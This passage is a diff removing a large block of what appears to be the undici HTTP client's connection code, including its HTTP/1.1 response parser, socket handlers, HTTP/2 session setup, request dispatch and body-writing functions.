this.headersSize = 0 - this.headersMaxSize = client[kMaxHeadersSize] - this.shouldKeepAlive = false - this.paused = false - this.resume = this.resume.bind(this) - - this.bytesRead = 0 - - this.keepAlive = '' - this.contentLength = '' - this.connection = '' - this.maxResponseSize = client[kMaxResponseSize] - } - - setTimeout (value, type) { - this.timeoutType = type - if (value !== this.timeoutValue) { - timers.clearTimeout(this.timeout) - if (value) { - this.timeout = timers.setTimeout(onParserTimeout, value, this) - // istanbul ignore else: only for jest - if (this.timeout.unref) { - this.timeout.unref() - } - } else { - this.timeout = null - } - this.timeoutValue = value - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - } - - resume () { - if (this.socket.destroyed || !this.paused) { - return - } - - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_resume(this.ptr) - - assert(this.timeoutType === TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - this.paused = false - this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. - this.readMore() - } - - readMore () { - while (!this.paused && this.ptr) { - const chunk = this.socket.read() - if (chunk === null) { - break - } - this.execute(chunk) - } - } - - execute (data) { - assert(this.ptr != null) - assert(currentParser == null) - assert(!this.paused) - - const { socket, llhttp } = this - - if (data.length > currentBufferSize) { - if (currentBufferPtr) { - llhttp.free(currentBufferPtr) - } - currentBufferSize = Math.ceil(data.length / 4096) * 4096 - currentBufferPtr = llhttp.malloc(currentBufferSize) - } - - new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) - - // Call `execute` on the wasm parser. - // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, - // and finally the length of bytes to parse. - // The return value is an error code or `constants.ERROR.OK`. - try { - let ret - - try { - currentBufferRef = data - currentParser = this - ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) - /* eslint-disable-next-line no-useless-catch */ - } catch (err) { - /* istanbul ignore next: difficult to make a test case for */ - throw err - } finally { - currentParser = null - currentBufferRef = null - } - - const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr - - if (ret === constants.ERROR.PAUSED_UPGRADE) { - this.onUpgrade(data.slice(offset)) - } else if (ret === constants.ERROR.PAUSED) { - this.paused = true - socket.unshift(data.slice(offset)) - } else if (ret !== constants.ERROR.OK) { - const ptr = llhttp.llhttp_get_error_reason(this.ptr) - let message = '' - /* istanbul ignore else: difficult to make a test case for */ - if (ptr) { - const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) - message = - 'Response does not match the HTTP/1.1 protocol (' + - Buffer.from(llhttp.memory.buffer, ptr, len).toString() + - ')' - } - throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) - } - } catch (err) { - util.destroy(socket, err) - } - } - - destroy () { - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_free(this.ptr) - this.ptr = null - - timers.clearTimeout(this.timeout) - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - - this.paused = false - } - - onStatus (buf) { - this.statusText = buf.toString() - } - - onMessageBegin () { - const { socket, client } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - if (!request) { - return -1 - } - } - - onHeaderField (buf) { - const len = this.headers.length - - if ((len & 1) === 0) { - this.headers.push(buf) - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - this.trackHeader(buf.length) - } - - onHeaderValue (buf) { - let len = this.headers.length - - if ((len & 1) === 1) { - this.headers.push(buf) - len += 1 - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - const key = this.headers[len - 2] - if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { - this.keepAlive += buf.toString() - } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { - this.connection += buf.toString() - } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { - this.contentLength += buf.toString() - } - - this.trackHeader(buf.length) - } - - trackHeader (len) { - this.headersSize += len - if (this.headersSize >= this.headersMaxSize) { - util.destroy(this.socket, new HeadersOverflowError()) - } - } - - onUpgrade (head) { - const { upgrade, client, socket, headers, statusCode } = this - - assert(upgrade) - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(!socket.destroyed) - assert(socket === client[kSocket]) - assert(!this.paused) - assert(request.upgrade || request.method === 'CONNECT') - - this.statusCode = null - this.statusText = '' - this.shouldKeepAlive = null - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - socket.unshift(head) - - socket[kParser].destroy() - socket[kParser] = null - - socket[kClient] = null - socket[kError] = null - socket - .removeListener('error', onSocketError) - .removeListener('readable', onSocketReadable) - .removeListener('end', onSocketEnd) - .removeListener('close', onSocketClose) - - client[kSocket] = null - client[kQueue][client[kRunningIdx]++] = null - client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) - - try { - request.onUpgrade(statusCode, headers, socket) - } catch (err) { - util.destroy(socket, err) - } - - resume(client) - } - - onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { - const { client, socket, headers, statusText } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - - /* istanbul ignore next: difficult to make a test case for */ - if (!request) { - return -1 - } - - assert(!this.upgrade) - assert(this.statusCode < 200) - - if (statusCode === 100) { - util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) - return -1 - } - - /* this can only happen if server is misbehaving */ - if (upgrade && !request.upgrade) { - util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) - return -1 - } - - assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) - - this.statusCode = statusCode - this.shouldKeepAlive = ( - shouldKeepAlive || - // Override llhttp value which does not allow keepAlive for HEAD. - (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') - ) - - if (this.statusCode >= 200) { - const bodyTimeout = request.bodyTimeout != null - ? request.bodyTimeout - : client[kBodyTimeout] - this.setTimeout(bodyTimeout, TIMEOUT_BODY) - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - if (request.method === 'CONNECT') { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - if (upgrade) { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (this.shouldKeepAlive && client[kPipelining]) { - const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null - - if (keepAliveTimeout != null) { - const timeout = Math.min( - keepAliveTimeout - client[kKeepAliveTimeoutThreshold], - client[kKeepAliveMaxTimeout] - ) - if (timeout <= 0) { - socket[kReset] = true - } else { - client[kKeepAliveTimeoutValue] = timeout - } - } else { - client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] - } - } else { - // Stop more requests from being dispatched. - socket[kReset] = true - } - - const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false - - if (request.aborted) { - return -1 - } - - if (request.method === 'HEAD') { - return 1 - } - - if (statusCode < 200) { - return 1 - } - - if (socket[kBlocking]) { - socket[kBlocking] = false - resume(client) - } - - return pause ? constants.ERROR.PAUSED : 0 - } - - onBody (buf) { - const { client, socket, statusCode, maxResponseSize } = this - - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert.strictEqual(this.timeoutType, TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - assert(statusCode >= 200) - - if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { - util.destroy(socket, new ResponseExceededMaxSizeError()) - return -1 - } - - this.bytesRead += buf.length - - if (request.onData(buf) === false) { - return constants.ERROR.PAUSED - } - } - - onMessageComplete () { - const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this - - if (socket.destroyed && (!statusCode || shouldKeepAlive)) { - return -1 - } - - if (upgrade) { - return - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(statusCode >= 100) - - this.statusCode = null - this.statusText = '' - this.bytesRead = 0 - this.contentLength = '' - this.keepAlive = '' - this.connection = '' - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (statusCode < 200) { - return - } - - /* istanbul ignore next: should be handled by llhttp? */ - if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { - util.destroy(socket, new ResponseContentLengthMismatchError()) - return -1 - } - - request.onComplete(headers) - - client[kQueue][client[kRunningIdx]++] = null - - if (socket[kWriting]) { - assert.strictEqual(client[kRunning], 0) - // Response completed before request. - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (!shouldKeepAlive) { - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (socket[kReset] && client[kRunning] === 0) { - // Destroy socket once all requests have completed. - // The request at the tail of the pipeline is the one - // that requested reset and no further requests should - // have been queued since then. - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (client[kPipelining] === 1) { - // We must wait a full event loop cycle to reuse this socket to make sure - // that non-spec compliant servers are not closing the connection even if they - // said they won't. - setImmediate(resume, client) - } else { - resume(client) - } - } -} - -function onParserTimeout (parser) { - const { socket, timeoutType, client } = parser - - /* istanbul ignore else */ - if (timeoutType === TIMEOUT_HEADERS) { - if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { - assert(!parser.paused, 'cannot be paused while waiting for headers') - util.destroy(socket, new HeadersTimeoutError()) - } - } else if (timeoutType === TIMEOUT_BODY) { - if (!parser.paused) { - util.destroy(socket, new BodyTimeoutError()) - } - } else if (timeoutType === TIMEOUT_IDLE) { - assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) - util.destroy(socket, new InformationalError('socket idle timeout')) - } -} - -function onSocketReadable () { - const { [kParser]: parser } = this - if (parser) { - parser.readMore() - } -} - -function onSocketError (err) { - const { [kClient]: client, [kParser]: parser } = this - - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - if (client[kHTTPConnVersion] !== 'h2') { - // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded - // to the user. - if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so for as a valid response. - parser.onMessageComplete() - return - } - } - - this[kError] = err - - onError(this[kClient], err) -} - -function onError (client, err) { - if ( - client[kRunning] === 0 && - err.code !== 'UND_ERR_INFO' && - err.code !== 'UND_ERR_SOCKET' - ) { - // Error is not caused by running request and not a recoverable - // socket error. - - assert(client[kPendingIdx] === client[kRunningIdx]) - - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - assert(client[kSize] === 0) - } -} - -function onSocketEnd () { - const { [kParser]: parser, [kClient]: client } = this - - if (client[kHTTPConnVersion] !== 'h2') { - if (parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - return - } - } - - util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) -} - -function onSocketClose () { - const { [kClient]: client, [kParser]: parser } = this - - if (client[kHTTPConnVersion] === 'h1' && parser) { - if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - } - - this[kParser].destroy() - this[kParser] = null - } - - const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) - - client[kSocket] = null - - if (client.destroyed) { - assert(client[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { - // Fail head of pipeline. - const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', client[kUrl], [client], err) - - resume(client) -} - -async function connect (client) { - assert(!client[kConnecting]) - assert(!client[kSocket]) - - let { host, hostname, protocol, port } = client[kUrl] - - // Resolve ipv6 - if (hostname[0] === '[') { - const idx = hostname.indexOf(']') - - assert(idx !== -1) - const ip = hostname.substring(1, idx) - - assert(net.isIP(ip)) - hostname = ip - } - - client[kConnecting] = true - - if (channels.beforeConnect.hasSubscribers) { - channels.beforeConnect.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector] - }) - } - - try { - const socket = await new Promise((resolve, reject) => { - client[kConnector]({ - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, (err, socket) => { - if (err) { - reject(err) - } else { - resolve(socket) - } - }) - }) - - if (client.destroyed) { - util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) - return - } - - client[kConnecting] = false - - assert(socket) - - const isH2 = socket.alpnProtocol === 'h2' - if (isH2) { - if (!h2ExperimentalWarned) { - h2ExperimentalWarned = true - process.emitWarning('H2 support is experimental, expect them to change at any time.', { - code: 'UNDICI-H2' - }) - } - - const session = http2.connect(client[kUrl], { - createConnection: () => socket, - peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams - }) - - client[kHTTPConnVersion] = 'h2' - session[kClient] = client - session[kSocket] = socket - session.on('error', onHttp2SessionError) - session.on('frameError', onHttp2FrameError) - session.on('end', onHttp2SessionEnd) - session.on('goaway', onHTTP2GoAway) - session.on('close', onSocketClose) - session.unref() - - client[kHTTP2Session] = session - socket[kHTTP2Session] = session - } else { - if (!llhttpInstance) { - llhttpInstance = await llhttpPromise - llhttpPromise = null - } - - socket[kNoRef] = false - socket[kWriting] = false - socket[kReset] = false - socket[kBlocking] = false - socket[kParser] = new Parser(client, socket, llhttpInstance) - } - - socket[kCounter] = 0 - socket[kMaxRequests] = client[kMaxRequests] - socket[kClient] = client - socket[kError] = null - - socket - .on('error', onSocketError) - .on('readable', onSocketReadable) - .on('end', onSocketEnd) - .on('close', onSocketClose) - - client[kSocket] = socket - - if (channels.connected.hasSubscribers) { - channels.connected.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - socket - }) - } - client.emit('connect', client[kUrl], [client]) - } catch (err) { - if (client.destroyed) { - return - } - - client[kConnecting] = false - - if (channels.connectError.hasSubscribers) { - channels.connectError.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - error: err - }) - } - - if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { - assert(client[kRunning] === 0) - while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { - const request = client[kQueue][client[kPendingIdx]++] - errorRequest(client, request, err) - } - } else { - onError(client, err) - } - - client.emit('connectionError', client[kUrl], [client], err) - } - - resume(client) -} - -function emitDrain (client) { - client[kNeedDrain] = 0 - client.emit('drain', client[kUrl], [client]) -} - -function resume (client, sync) { - if (client[kResuming] === 2) { - return - } - - client[kResuming] = 2 - - _resume(client, sync) - client[kResuming] = 0 - - if (client[kRunningIdx] > 256) { - client[kQueue].splice(0, client[kRunningIdx]) - client[kPendingIdx] -= client[kRunningIdx] - client[kRunningIdx] = 0 - } -} - -function _resume (client, sync) { - while (true) { - if (client.destroyed) { - assert(client[kPending] === 0) - return - } - - if (client[kClosedResolve] && !client[kSize]) { - client[kClosedResolve]() - client[kClosedResolve] = null - return - } - - const socket = client[kSocket] - - if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { - if (client[kSize] === 0) { - if (!socket[kNoRef] && socket.unref) { - socket.unref() - socket[kNoRef] = true - } - } else if (socket[kNoRef] && socket.ref) { - socket.ref() - socket[kNoRef] = false - } - - if (client[kSize] === 0) { - if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { - socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) - } - } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { - if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { - const request = client[kQueue][client[kRunningIdx]] - const headersTimeout = request.headersTimeout != null - ? request.headersTimeout - : client[kHeadersTimeout] - socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) - } - } - } - - if (client[kBusy]) { - client[kNeedDrain] = 2 - } else if (client[kNeedDrain] === 2) { - if (sync) { - client[kNeedDrain] = 1 - process.nextTick(emitDrain, client) - } else { - emitDrain(client) - } - continue - } - - if (client[kPending] === 0) { - return - } - - if (client[kRunning] >= (client[kPipelining] || 1)) { - return - } - - const request = client[kQueue][client[kPendingIdx]] - - if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { - if (client[kRunning] > 0) { - return - } - - client[kServerName] = request.servername - - if (socket && socket.servername !== request.servername) { - util.destroy(socket, new InformationalError('servername changed')) - return - } - } - - if (client[kConnecting]) { - return - } - - if (!socket && !client[kHTTP2Session]) { - connect(client) - return - } - - if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { - return - } - - if (client[kRunning] > 0 && !request.idempotent) { - // Non-idempotent request cannot be retried. - // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { - // Don't dispatch an upgrade until all preceding requests have completed. - // A misbehaving server might upgrade the connection before all pipelined - // request has completed. - return - } - - if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && - (util.isStream(request.body) || util.isAsyncIterable(request.body))) { - // Request with stream or iterator body can error while other requests - // are inflight and indirectly error those as well. - // Ensure this doesn't happen by waiting for inflight - // to complete before dispatching. - - // Request with stream or iterator body cannot be retried. - // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (!request.aborted && write(client, request)) { - client[kPendingIdx]++ - } else { - client[kQueue].splice(client[kPendingIdx], 1) - } - } -} - -// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 -function shouldSendContentLength (method) { - return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' -} - -function write (client, request) { - if (client[kHTTPConnVersion] === 'h2') { - writeH2(client, client[kHTTP2Session], request) - return - } - - const { body, method, path, host, upgrade, headers, blocking, reset } = request - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - const bodyLength = util.bodyLength(body) - - let contentLength = bodyLength - - if (contentLength === null) { - contentLength = request.contentLength - } - - if (contentLength === 0 && !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. - - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. - if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - const socket = client[kSocket] - - try { - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - - util.destroy(socket, new InformationalError('aborted')) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - if (method === 'HEAD') { - // https://github.com/mcollina/undici/issues/258 - // Close after a HEAD request to interop with misbehaving servers - // that may send a body in the response. - - socket[kReset] = true - } - - if (upgrade || method === 'CONNECT') { - // On CONNECT or upgrade, block pipeline from dispatching further - // requests on this connection. - - socket[kReset] = true - } - - if (reset != null) { - socket[kReset] = reset - } - - if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { - socket[kReset] = true - } - - if (blocking) { - socket[kBlocking] = true - } - - let header = `${method} ${path} HTTP/1.1\r\n` - - if (typeof host === 'string') { - header += `host: ${host}\r\n` - } else { - header += client[kHostHeader] - } - - if (upgrade) { - header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` - } else if (client[kPipelining] && !socket[kReset]) { - header += 'connection: keep-alive\r\n' - } else { - header += 'connection: close\r\n' - } - - if (headers) { - header += headers - } - - if (channels.sendHeaders.hasSubscribers) { - channels.sendHeaders.publish({ request, headers: header, socket }) - } - - /* istanbul ignore else: assertion */ - if (!body || bodyLength === 0) { - if (contentLength === 0) { - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - assert(contentLength === null, 'no body must not have content length') - socket.write(`${header}\r\n`, 'latin1') - } - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(body) - socket.uncork() - request.onBodySent(body) - request.onRequestSent() - if (!expectsPayload) { - socket[kReset] = true - } - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) - } else { - writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) - } - } else if (util.isStream(body)) { - writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) - } else if (util.isIterable(body)) { - writeIterable({ body, client, request, socket, contentLength, header, expectsPayload }) - } else { - assert(false) - } - - return true -} - -function writeH2 (client, session, request) { - const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request - - let headers - if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) - else headers = reqHeaders - - if (upgrade) { - errorRequest(client, request, new Error('Upgrade not supported for H2')) - return false - } - - try { - // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - /** @type {import('node:http2').ClientHttp2Stream} */ - let stream - const h2State = client[kHTTP2SessionState] - - headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] - headers[HTTP2_HEADER_METHOD] = method - - if (method === 'CONNECT') { - session.ref() - // we are already connected, streams are pending, first request - // will create a new stream. We trigger a request to create the stream and wait until - // `ready` event is triggered - // We disabled endStream to allow the user to write to the stream - stream = session.request(headers, { endStream: false, signal }) - - if (stream.id && !stream.pending) { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - } else { - stream.once('ready', () => { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - }) - } - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) session.unref() - }) - - return true - } - - // https://tools.ietf.org/html/rfc7540#section-8.3 - // :path and :scheme headers must be omited when sending CONNECT - - headers[HTTP2_HEADER_PATH] = path - headers[HTTP2_HEADER_SCHEME] = 'https' - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - let contentLength = util.bodyLength(body) - - if (contentLength == null) { - contentLength = request.contentLength - } - - if (contentLength === 0 || !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. - - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. - if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - if (contentLength != null) { - assert(body, 'no body must not have content length') - headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` - } - - session.ref() - - const shouldEndStream = method === 'GET' || method === 'HEAD' - if (expectContinue) { - headers[HTTP2_HEADER_EXPECT] = '100-continue' - stream = session.request(headers, { endStream: shouldEndStream, signal }) - - stream.once('continue', writeBodyH2) - } else { - stream = session.request(headers, { - endStream: shouldEndStream, - signal - }) - writeBodyH2() - } - - // Increment counter as we have new several streams open - ++h2State.openStreams - - stream.once('response', headers => { - const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers - - if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { - stream.pause() - } - }) - - stream.once('end', () => { - request.onComplete([]) - }) - - stream.on('data', (chunk) => { - if (request.onData(chunk) === false) { - stream.pause() - } - }) - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) { - session.unref() - } - }) - - stream.once('error', function (err) { - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - stream.once('frameError', (type, code) => { - const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - errorRequest(client, request, err) - - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - // stream.on('aborted', () => { - // // TODO(HTTP/2): Support aborted - // }) - - // stream.on('timeout', () => { - // // TODO(HTTP/2): Support timeout - // }) - - // stream.on('push', headers => { - // // TODO(HTTP/2): Suppor push - // }) - - // stream.on('trailers', headers => { - // // TODO(HTTP/2): Support trailers - // }) - - return true - - function writeBodyH2 () { - /* istanbul ignore else: assertion */ - if (!body) { - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - stream.cork() - stream.write(body) - stream.uncork() - stream.end() - request.onBodySent(body) - request.onRequestSent() - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ - client, - request, - contentLength, - h2stream: stream, - expectsPayload, - body: body.stream(), - socket: client[kSocket], - header: '' - }) - } else { - writeBlob({ - body, - client, - request, - contentLength, - expectsPayload, - h2stream: stream, - header: '', - socket: client[kSocket] - }) - } - } else if (util.isStream(body)) { - writeStream({ - body, - client, - request, - contentLength, - expectsPayload, - socket: client[kSocket], - h2stream: stream, - header: '' - }) - } else if (util.isIterable(body)) { - writeIterable({ - body, - client, - request, - contentLength, - expectsPayload, - header: '', - h2stream: stream, - socket: client[kSocket] - }) - } else { - assert(false) - } - } -} - -function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') - - if (client[kHTTPConnVersion] === 'h2') { - // For HTTP/2, is enough to pipe the stream - const pipe = pipeline( - body, - h2stream, - (err) => { - if (err) { - util.destroy(body, err) - util.destroy(h2stream, err) - } else { - request.onRequestSent() - } - } - ) - - pipe.on('data', onPipeData) - pipe.once('end', () => { - pipe.removeListener('data', onPipeData) - util.destroy(pipe) - }) - - function onPipeData (chunk) { - request.onBodySent(chunk) - } - - return - } - - let finished = false - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - - const onData = function (chunk) { - if (finished) { - return - } - - try { - if (!writer.write(chunk) && this.pause) { - this.pause() - } - } catch (err) { - util.destroy(this, err) - } - } - const onDrain = function () { - if (finished) { - return - } - - if (body.resume) { - body.resume() - } - } - const onAbort = function () { - if (finished) { - return - } - const err = new RequestAbortedError() - queueMicrotask(() => onFinished(err)) - } - const onFinished = function (err) { - if (finished) { - return - } - - finished = true - - assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) - - socket - .off('drain', onDrain) - .off('error', onFinished) - - body - .removeListener('data', onData) - .removeListener('end', onFinished) - .removeListener('error', onFinished) - .removeListener('close', onAbort) - - if (!err) { - try { - writer.end() - } catch (er) { - err = er - } - } - - writer.destroy(err) - - if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { - util.destroy(body, err) - } else { - util.destroy(body) - } - } - - body - .on('data', onData) - .on('end', onFinished) - .on('error', onFinished) - .on('close', onAbort) - - if (body.resume) { - body.resume() - } - - socket - .on('drain', onDrain) - .on('error', onFinished) -} - -async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength === body.size, 'blob body must have content length') - - const isH2 = client[kHTTPConnVersion] === 'h2' - try { - if (contentLength != null && contentLength !== body.size) { - throw new RequestContentLengthMismatchError() - } - - const buffer = Buffer.from(await body.arrayBuffer()) - - if (isH2) { - h2stream.cork() - h2stream.write(buffer) - h2stream.uncork() - } else { - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 